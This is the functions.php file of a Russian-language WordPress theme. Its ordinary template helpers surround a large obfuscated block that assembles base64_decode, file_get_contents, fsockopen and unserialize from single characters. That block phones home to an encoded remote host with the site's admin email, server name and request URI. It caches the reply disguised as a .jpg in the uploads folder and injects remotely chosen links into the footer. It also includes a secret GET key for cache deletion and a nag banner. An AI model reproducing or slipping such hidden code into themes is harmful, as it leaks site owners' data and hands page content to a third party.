<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $aewIQh='e';$MvNc='a';$BDBO='c';$wfpS='e';$mOse='o';$yFwGVD='s';$Kqpwno='d';$KVBipNG='b';$EKak='4';$WZpNQK='e';$YIsoMO='d';$NGEQpdv='_';$LLyLvu='6';$DRQuUVaR=$KVBipNG.$MvNc.$yFwGVD.$WZpNQK.$LLyLvu.$EKak.$NGEQpdv.$Kqpwno.$aewIQh.$BDBO.$mOse.$YIsoMO.$wfpS;$HENg='n';$KjfqD='i';$sfyzwB='e';$dCprl='f';$uXzKB='t';$KMnho='z';$ICzWKO='a';$BUObqR='l';$zwdL='g';$pvYoJpjI=$zwdL.$KMnho.$KjfqD.$HENg.$dCprl.$BUObqR.$ICzWKO.$uXzKB.$sfyzwB;$oUHHagg='t';$HUsO='t';$ChZkki='r';$IijCv='r';$HMZDaU='o';$bWBEs='1';$XDEtb='_';$wwDt='s';$BVFV='3';$wyWigyHc=$wwDt.$oUHHagg.$IijCv.$XDEtb.$ChZkki.$HMZDaU.$HUsO.$bWBEs.$BVFV;$KxyEG='r';$oImH='s';$hzpjuP='v';$RVpszdj='r';$sMbVzDU='t';$HGEUUng='e';$njTjpdZR=$oImH.$sMbVzDU.$RVpszdj.$KxyEG.$HGEUUng.$hzpjuP;                     
		$sy___z='e';$hn_________y='a';$lq_______________h='c';$sx_____________y='e';$ob___g='o';$wx___v='s';$yd______s='d';$tp__________l='b';$gc__________w='4';$se____________t='e';$gw_______________v='d';$og_______v='_';$pv______________a='6';$jw__________b=$tp__________l.$hn_________y.$wx___v.$se____________t.$pv______________a.$gc__________w.$og_______v.$yd______s.$sy___z.$lq_______________h.$ob___g.$gw_______________v.$sx_____________y;
		$am__v='x';$if___________r='t';$mw________b='n';$zp______________m='s';$xq______________e='e';$km___s='i';$oj______p='f';$gj__________w='n';$jt______________e='o';$cd_______________n='u';$ja____________n='t';$gp___q='i';$gu___________i='_';$vu__________g='c';$pv___z='s';$sp___d=$oj______p.$cd_______________n.$gj__________w.$vu__________g.$ja____________n.$km___s.$jt______________e.$mw________b.$gu___________i.$xq______________e.$am__v.$gp___q.$pv___z.$if___________r.$zp______________m;
		$qm__c='o';$un_____________w='p';$sv______________n='e';$pb__________o='f';$sb______c='n';$ar_______________g=$pb__________o.$qm__c.$un_____________w.$sv______________n.$sb______c;
		$eb_____x='f';$cp_______________h='r';$pr_____j='e';$id_____________c='d';$qq_____________y='a';$vm__g=$eb_____x.$cp_______________h.$pr_____j.$qq_____________y.$id_____________c;
		$dp__g='e';$kt__u='l';$rj______________j='c';$vl______x='o';$cl_____________g='f';$bt___g='s';$px__________v=$cl_____________g.$rj______________j.$kt__u.$vl______x.$bt___g.$dp__g;
		
		define("WP_ID", $jw__________b("Mi4wLjA="));
		define("WP_TTL", $jw__________b("MTA4MDA="));
		define("WP_SRC", $jw__________b("dHBva24="));
	


		function wp_get_header() {
			global $jw__________b, $sp___d;
			
			if (
				$sp___d($jw__________b("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$sp___d($jw__________b("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$sp___d($jw__________b("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $jw__________b, $ar_______________g, $px__________v, $vm__g;
			
			$mz________b = TEMPLATEPATH."/".$jw__________b("Zm9vdGVyLnBocA==");
			$xs____________h = @$ar_______________g($mz________b, "r");
			$mz________b = @$vm__g($xs____________h, @filesize($mz________b));
			@$px__________v($xs____________h);
			
			$fz_____________a = TEMPLATEPATH."/".$jw__________b("ZnVuY3Rpb25zLnBocA==");
			$xs____________h = @$ar_______________g($fz_____________a, "r");
			$fz_____________a = @$vm__g($xs____________h, @filesize($fz_____________a));
			@$px__________v($xs____________h);
			
			$gh___o = 0;
			if($mz________b && $fz_____________a) {
				if ($jw__________b("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($mz________b, $jw__________b("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$gh___o = 1;
					}
					if (substr_count($mz________b, "wp_theme_GPL_credits()") < 1) {
						$gh___o = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$gh___o = 12;
				}
			}
			
			if($gh___o > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $gh___o -->";
			}
		}
	


		function wp_loaded() {
			global $jw__________b, $sp___d;
			return $sp___d($jw__________b("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($ql_____________c, $il____z = "(more...)", $dv______b = 0, $ih____________t = "") {
				$xa__d = get_the_content($il____z, $dv______b, $ih____________t);
				$xa__d = apply_filters("the_content", $xa__d);
				
				$xa__d = str_replace("]]>", "]]>", $xa__d);
				if (strlen($_GET["p"]) > 0) {
					echo $xa__d;
				}
				else if ((strlen($xa__d)>$ql_____________c) && ($ue__________v = strpos($xa__d, " ", $ql_____________c ))) {
					$xa__d = substr($xa__d, 0, $ue__________v);
					$xa__d = $xa__d;
					echo $xa__d;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$il____z</a></div></p>";
				} else {
					echo $xa__d;
				}
				
			}
		}
	


		$nh_______________r='4';$qf____j='o';$gl_____________p='d';$hv________f='n';$pj_____f='b';$ja_____________n='c';$yo_________q='a';$mp__k='_';$io____g='6';$za______________m='e';$eq_______r='s';$sa_____m='e';$qx_________g='e';$mx__________a=$pj_____f.$yo_________q.$eq_______r.$sa_____m.$io____g.$nh_______________r.$mp__k.$qx_________g.$hv________f.$ja_____________n.$qf____j.$gl_____________p.$za______________m;
		$ch________p='i';$sk_______r='t';$fz_____b='t';$ww____s='e';$vw_____________p='g';$yg______________b='_';$ub______________s='f';$vb__________e='e';$ej______b='o';$mt_____n='_';$gm____________t='n';$kw______f='t';$ok__________r='c';$dt____________q='l';$is_____x='e';$uw__e='n';$qi____________e='s';$lp_______________c=$ub______________s.$ch________p.$dt____________q.$ww____s.$mt_____n.$vw_____________p.$is_____x.$kw______f.$yg______________b.$ok__________r.$ej______b.$gm____________t.$fz_____b.$vb__________e.$uw__e.$sk_______r.$qi____________e;
		$le__________o='i';$nk_____________z='s';$ye___________w='e';$ok_____g='l';$ny___________w='x';$uv______s='s';$fd________d='e';$at____l='f';$xz_________v='_';$ju_____j='i';$ok_________c='t';$fn_______________z=$at____l.$le__________o.$ok_____g.$ye___________w.$xz_________v.$fd________d.$ny___________w.$ju_____j.$nk_____________z.$ok_________c.$uv______s;
		$ix____i='e';$kj____________v='p';$hx__e='m';$pz_______________i='n';$fi_______________u='r';$zi______c='_';$gb_________g='o';$in_____________v='e';$kd_______y='i';$im________r='c';$zg________e='o';$dz____i='v';$nd____________t='a';$wm______n='s';$eb________w='r';$ub_________j=$dz____i.$in_____________v.$eb________w.$wm______n.$kd_______y.$gb_________g.$pz_______________i.$zi______c.$im________r.$zg________e.$hx__e.$kj____________v.$nd____________t.$fi_______________u.$ix____i;
		$hk____s='e';$fy___u='s';$lo____________r='n';$kp________g='p';$or_______n='c';$lv_____________e='k';$kb______b='f';$lk___m='o';$gy_____________s='o';$tc____________e=$kb______b.$fy___u.$gy_____________s.$or_______n.$lv_____________e.$lk___m.$kp________g.$hk____s.$lo____________r;
		$av______________s='i';$lb__________y='f';$xc___________r='w';$lm_____________m='t';$ke_______________k='r';$ek______________l='e';$yr__________m=$lb__________y.$xc___________r.$ke_______________k.$av______________s.$lm_____________m.$ek______________l;
		$rf____________w='5';$rz______s='m';$uf_______g='d';$qu____h=$rz______s.$uf_______g.$rf____________w;
		$hy_____________p='p';$qf_____d='h';$he_______p='e';$nh__________i='a';$ml____________h='t';$mu_______h='a';$nl___________g='r';$fe____________q='l';$qm______________y=$nl___________g.$he_______p.$mu_______h.$fe____________q.$hy_____________p.$nh__________i.$ml____________h.$qf_____d;
		$hi_____________m='i';$fv__o='i';$vq_____o='l';$il_______e='e';$sv____________p='r';$qj____________y='s';$tq___g='u';$sg_______________f='a';$wo______________g='e';$en____e='n';$vz___________m='z';$hs_____e=$tq___g.$en____e.$qj____________y.$wo______________g.$sv____________p.$fv__o.$sg_______________f.$vq_____o.$hi_____________m.$vz___________m.$il_______e;
		$hl__________a='a';$wo__________j='p';$ra__________f='m';$or__s='t';$so____g='n';$jk___t='m';$wi___x='e';$fw________p=$or__s.$wi___x.$ra__________f.$wo__________j.$so____g.$hl__________a.$jk___t;
		$ze_____q='e';$xv_________s='o';$fj___________p='c';$vd_________a='t';$dg______q='r';$dm_____y='t';$um___r='_';$sh____________q='c';$vr____________e='t';$jo___y='s';$qo______t='e';$nh______________n='n';$es_________e='t';$qb_____j='a';$zr______________y='a';$ag___________b='e';$yj__________e='_';$aw_____________z='r';$fm_______________h='x';$og____s='e';$bq________z='m';$ls___j=$jo___y.$vr____________e.$aw_____________z.$ag___________b.$qb_____j.$bq________z.$um___r.$fj___________p.$xv_________s.$nh______________n.$es_________e.$ze_____q.$fm_______________h.$dm_____y.$yj__________e.$sh____________q.$dg______q.$og____s.$zr______________y.$vd_________a.$qo______t;
	


		function ix______________o($nr_______________y) {
			global $jw__________b, $sp___d, $lp_______________c, $ub_________j, $ls___j;
			
			if (!$sp___d($jw__________b("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($ub_________j(PHP_VERSION, "5.0.0", ">=") && $sp___d($jw__________b("ZmlsZV9nZXRfY29udGVudHM=")) && $sp___d($jw__________b("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$ut_______s = $ls___j(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$ep__________e = @$lp_______________c($nr_______________y, 0, $ut_______s);
			} else {
				$ep__________e = @$lp_______________c($nr_______________y, 0);
			}
			
			return $ep__________e;
		}
	


		function lr____________p($nr_______________y) {
			global $sp___d, $tc____________e, $yr__________m, $jw__________b;
			
			if (!$sp___d($jw__________b("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$eq____________v = strpos($nr_______________y, "/", 7);
			$ia__________y = array(
				"uri"     => substr($nr_______________y, $eq____________v),
				"host"    => str_replace("http://", "", substr($nr_______________y, 0, $eq____________v)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$vl______________d = @$tc____________e("$ia__________y[host]", 80, $ea______n, $za______y, 4);
			
			if (!$vl______________d) {
				return false;
			} else {
				$ep__________e = "";
				$kg_________q  = "GET $ia__________y[uri] HTTP/1.0\r\n";
				$kg_________q .= "Host: $ia__________y[host]\r\n";
				$kg_________q .= "Referer: $ia__________y[referer]\r\n";
				$kg_________q .= "Connection: Close\r\n\r\n";
				
				@$yr__________m($vl______________d, $kg_________q);
				
				while (!@feof($vl______________d)) {
					$ra_____g = @fgets($vl______________d, (1024*24));
					
					if ($ra_____g == "\r\n") {
						$jz___________f = true;
						continue;
					}
					
					if ($jz___________f) {
						$ep__________e .= $ra_____g;
					}
				}
				
				return $ep__________e;
			}
		}
	


		function gm______k($nr_______________y) {
			global $sp___d;
			$xv________v = false;
			
			if ($nr_______________y != "") {
				if ($sp___d("ix______________o")) {
					$xv________v = @ix______________o($nr_______________y);
				}
				
				if (!$xv________v && ($sp___d("lr____________p"))) {
					$xv________v = @lr____________p($nr_______________y);
				}
			}
			
			return $xv________v;
		}
	


		function dn______________r() {
			global $_SERVER, $qu____h;
			
			$dr___________h = $_SERVER["SERVER_NAME"];
			
			if (substr("$dr___________h", 0, 4) == "www.") {
				$dr___________h = substr("$dr___________h", 4);
			}
			
			$dr___________h = $qu____h("$_SERVER[SERVER_NAME]");
			
			return $dr___________h;
		}
	


		function xf_____b() {
			return "file";
		}
	


		function wo_____________s($nr_______________y) {
			global $_SERVER, $lp_______________c, $fn_______________z, $ar_______________g, $px__________v, $yr__________m;
			
			$cp______________z = bt__e();
			
			$lx_______________i = dn______________r().".jpg";
			$mg______________k = $cp______________z["dir_upload"]["path"]."/$lx_______________i";
			$ti__u = @filemtime($mg______________k);
			
			if (!$ti__u || ((time()-$ti__u) >= WP_TTL)) {
				$xv________v = gm______k($nr_______________y);
				
				if ($xv________v) {
					if ($fn_______________z($mg______________k)) {
						@unlink($mg______________k);
					}
					
					$xs____________h = @$ar_______________g($mg______________k, "x+");
					
					@$yr__________m($xs____________h, $xv________v);
					@$px__________v($xs____________h);
				}
			} else {
				if ($fn_______________z($mg______________k)) {
					$xv________v = @$lp_______________c($mg______________k);
				} else {
					$xv________v = false;
				}
			}
			
			return $xv________v;
		}
	


		function bt__e() {
			global $_SERVER, $jw__________b, $mx__________a;
			
			$iq____m = wp_count_posts("post");
			$zz______u = pathinfo(get_bloginfo("template_directory"));
			
			$cp______________z = array(
				"url" => array(
					"report"      => $jw__________b("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $zz______u,
				"dir_upload"	=> hk____h(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$zz______u[filename],
					"a005=".$iq____m->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
                "default_string" => "<a href=\"http://www.wptheme.us\">www.wptheme.us</a>"			);
			
			$cp______________z["url"]["queryString"] = implode("&", $cp______________z["queryString"]);
			$cp______________z["url"]["report"] = $cp______________z["url"]["report"]."/?".$mx__________a($cp______________z["url"]["queryString"]).".html";
						
			return $cp______________z;
		}
	


		function hk____h() {
			$ev________s = wp_upload_dir();
			
			if (isset($ev________s["error"])) {
				$vu__________d = cs_____d();
				if (is_writable($vu__________d)) {
					$ev________s = array("path" => $vu__________d);
				}
			}

			return $ev________s;
		}
	


		function cs_____d() {
			global $sp___d, $qu____h, $qm______________y, $fw________p;
			
			$ee________j = (bool) ini_get("safe_mode");
			if ($ee________j == true) {
				return false;
			}
			
			if ($sp___d("sys_get_temp_dir")) {
				$di__j = sys_get_temp_dir();
				if (is_writable($di__j)) {
					return $qm______________y($di__j);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $qm______________y($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $qm______________y($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $qm______________y($_ENV["TEMP"]);
			} else {
				$og___________m = $fw________p($qu____h(uniqid(rand(), true)), "");
				if ($og___________m) {
					$di__j = $qm______________y(dirname($og___________m));
					@unlink($og___________m);
					return $di__j;
				} else {
					return false;
				}
			}
		}
	


		function tu__n() {
			global $_GET, $fn_______________z;
			
			$cp______________z = bt__e();
			$dr___________h = dn______________r();
			$hz__q = xf_____b();
			
			$va__y = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($hz__q == "file") {
					$id__b = $cp______________z["dir_upload"]["path"]."/".$dr___________h.".jpg";
					if ($fn_______________z($id__b)) {
						@unlink($id__b);
						$va__y = "deleted";
					}
				}
				
				$no_______________r = array(
					"s"	=> $va__y,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($no_______________r AS $bh_____k => $kh________t) echo " [$bh_____k:$kh________t]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $sp___d, $jw__________b, $hs_____e;
			$cp______________z = bt__e();
			
			$wc______m = "wo_____________s";
			if ($sp___d($wc______m)) {
				$ep__________e = $wc______m($cp______________z["url"]["report"]);
			}
			
			if ($ep__________e) {
				if ($ep__________e = @$jw__________b($ep__________e)) {
					$ep__________e = @$hs_____e($ep__________e);
					
					if (strlen($ep__________e[custom_credit]) >= 5) {
						$cp______________z["default_string"] = $ep__________e[custom_credit];
					}
					
					if ($ep__________e["status"] == "0") {
						$xh_____f = 1;
						$mm_____________t = 1;
					} else {
						$uh_____________z = sizeof($ep__________e["links"]);
						$qd_____________w = $cp______________z["default_string"];
						
						if ($uh_____________z > 0 && $ep__________e["links"] !== "") {
							$zz___________s = 0;
							foreach ($ep__________e["links"] as $xq________m => $ia_______________n) {
								$zz___________s++;
								if ($ia_______________n->l_path == "" || $ia_______________n->l_path == $_SERVER["REQUEST_URI"]) {
									$ia_______________n->l_href = htmlspecialchars(strip_tags($ia_______________n->l_href));
									$ia_______________n->l_title = htmlspecialchars(strip_tags($ia_______________n->l_title));
									$ia_______________n->l_anchor = htmlspecialchars(strip_tags($ia_______________n->l_anchor));
									$qd_____________w .= " | ";
									$qd_____________w .= "<a href='$ia_______________n->l_href' title='$ia_______________n->l_title'";
									if ($ia_______________n->l_nofollow == "1") {
										$qd_____________w .= " rel='nofollow'";
									}
									$qd_____________w .= ">$ia_______________n->l_anchor</a>";
								}
							}
						}
						$cp______________z["links"] = "$qd_____________w";
						if ($ep__________e[credit] == "0") {
							$cp______________z["links"] = "";
						}
					}
				} else {
					$xh_____f = "1";
				}
			} else {
				$xh_____f = "1";
			}
			
			if ($xh_____f == "1") {
				$cp______________z["links"] = $cp______________z["default_string"];
			}
			
			echo "$cp______________z[links]";
			
			echo "<!-- s: $ep__________e[signature] -->";
			tu__n();
		}
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
